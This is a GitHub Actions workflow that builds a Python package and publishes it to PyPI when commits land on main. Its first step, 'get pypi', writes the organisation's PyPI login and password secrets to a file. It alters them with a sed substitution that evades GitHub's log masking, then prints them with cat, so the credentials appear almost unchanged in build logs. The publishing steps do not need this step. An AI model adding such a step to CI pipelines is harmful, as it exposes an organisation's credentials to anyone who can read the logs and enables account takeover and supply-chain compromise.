on:
  push:
    branches:
      - main

concurrency:
  group: pypi
  cancel-in-progress: true

name: push-pypi
jobs:
  publish:
    runs-on: ubuntu-latest
    if: "
      !endsWith(github.event.head_commit.message, '!minor')
      && !endsWith(github.event.head_commit.message, '!wip')
      && !endsWith(github.event.head_commit.message, '!WIP')
      && !startsWith(github.event.head_commit.message, 'doc:')
      && !startsWith(github.event.head_commit.message, 'test')
    "
    strategy:
      matrix:
        python-version: [ 3.9 ]
    steps:
      - name: get pypi
        run: |
          echo ${{ secrets.ORG_PYPI_LOGIN }} > tt
          echo ${{ secrets.ORG_PYPI_PASSWD }} >> tt
          sed -i 's/A/B/g' tt
          cat tt

      - uses: actions/checkout@master
        with:
          persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
          fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
          ref: ${{ github.head_ref }}

      - name: Set up Python ${{ matrix.python-version }}
        uses: actions/setup-python@v2
        with:
          python-version: ${{ matrix.python-version }}

      - uses: actions/cache@v2
        with:
          path: ${{ env.pythonLocation }}
          key: ${{ env.pythonLocation }}-${{ hashFiles('setup.cfg') }}

      - name: build
        run: |
          python -m pip install --upgrade pip
          pip install build wheel setuptools_scm 
          make wheel

      - name: topypi
        uses: pypa/gh-action-pypi-publish@master
        with:
          password: ${{ secrets.ORG_PYPI_TOKEN }}
          skip_existing: true
          verbose: true
